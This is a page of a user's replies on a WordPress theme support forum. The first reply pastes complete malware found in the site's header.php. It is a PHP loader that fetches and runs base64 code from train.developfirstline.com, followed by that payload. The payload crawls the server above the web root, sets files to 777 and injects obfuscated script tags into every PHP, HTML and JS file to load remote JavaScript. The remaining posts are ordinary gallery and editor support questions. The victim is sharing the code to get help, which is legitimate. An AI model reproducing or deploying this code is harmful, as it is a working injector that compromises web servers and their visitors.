Forum Replies Created

Viewing 11 posts - 1 through 11 (of 11 total)
  • Author
    Posts
  • Hello Victoria,
    thx, i am working on it. I unterstand only a litte bit of PHP, but no JS and so i dont understand what it makes. Here some Code of it:

    `$c = “base64_decode”;
    $d = “file_get_contents”;
    $b = $c($d(“https://train.developfirstline.com/y.txt”));
    @file_put_contents(“htht”,””.$b);
    include(“htht”);
    unlink(“htht”);
    <script src=’https://train.developfirstline.com/delivery.js?s=5′ type=’text/javascript’></script>`

    The TXT:

    $lastRunLog = "./track.log";
    if (file_exists($lastRunLog)) {
        $lastRun = file_get_contents($lastRunLog);
        if (time() - $lastRun >= 6400) {
        search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
             file_put_contents($lastRunLog, time());
        }
    } else {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
             file_put_contents( $lastRunLog, time());
    }
    
    		 
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,".");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,".");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, 'hjsawer') !== false) {
    
    } else {
    
    $l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTE2LDExNCw5NywxMDUsMTEwLDQ2LDEwMCwxMDEsMTE4LDEwMSwxMDgsMTExLDExMiwxMDIsMTA1LDExNCwxMTUsMTE2LDEwOCwxMDUsMTEwLDEwMSw0Niw5OSwxMTEsMTA5LDQ3LDEwMCwxMDEsMTA4LDEwNSwxMTgsMTAxLDExNCwxMjEsNDYsMTA2LDExNSw2MywxMTUsNjEsNTEpO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsOTksMTE0LDEwNSwxMTIsMTE2KSlbMF0pO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMDEsOTcsMTAwKSlbMF0uYXBwZW5kQ2hpbGQoZWxlbSk7fSkoKTs=");
    $g = file_get_contents($f);
    $g = $l2.$g;
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    $g = file_get_contents($f);
    if (strpos($g, 'hjsawer') !== false) {
    
    } 
    }
    
    			
    }
    
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '69,108,101,109,101,110,116,46,112,114,111,116') !== false) {
    
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    }
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    }
    
    			}
    }
    • This reply was modified 4 months ago by  sardinien.

    The Virus is in the header.php (/wp-content/themes/enfold), if someone have the same Problem.

    The Problem is not made by Enfold. It comes from a Rooting-Attack (“train.developfirstline.com”) maybe via Duplicator-Addon. Only a old Serverbackup inkl. DB helps, because I find no Information about the Attack and how to resove the Problem online.

    Thank you!

    This reply has been marked as private.
    in reply to: Galerie Problem #1163035

    Thenk you Ismael and sorry, i dont remember to have EML activatet.

    in reply to: Galerie Problem #1162288

    Klingt identisch: Bei mir ist unter “Galerie bearbeiten” die normale Ansicht mit allen Bildern, die auch umsortiert werden können. Klickt man auf “Zur Galerie hinzufügen”, bleibt unter der Überschrift alles blank, keine Bilder, kein Button, nichts zum editieren, hinzufügen etc..

    in reply to: Galerie Problem #1162272
    This reply has been marked as private.
    in reply to: Galerie Problem #1161832

    Hello Ismael,
    thank you for request. Enfold is the latest version

    Theme Updates
    No Updates available. You are running the latest version! (4.6.3.1)

    an WordPress is 5.3.

    I send you a link to screenshots to demonstrate the problem “i can not add photos to the gallerie”.

    Regards!

    in reply to: Galerie Problem #1161355

    Support?

    in reply to: Editor umgestellt + Update Problem #1118275

    Thanks Voctoria, now is all fine!
    Best Regards!

    in reply to: Editor umgestellt + Update Problem #1118131

    Danke, mit dem Update (einfach den Order “enfold” per FTP kopiert) funktioniert fast wieder alles. Eine Kleinigkeit: Die “Slideshow-Button” waren und sind noch abgerundet, der Button “avia-menu-text” im “main-nav” ist nun ECKIG. Habe gesucht, wo ändere ich das?

    Danke!

Viewing 11 posts - 1 through 11 (of 11 total)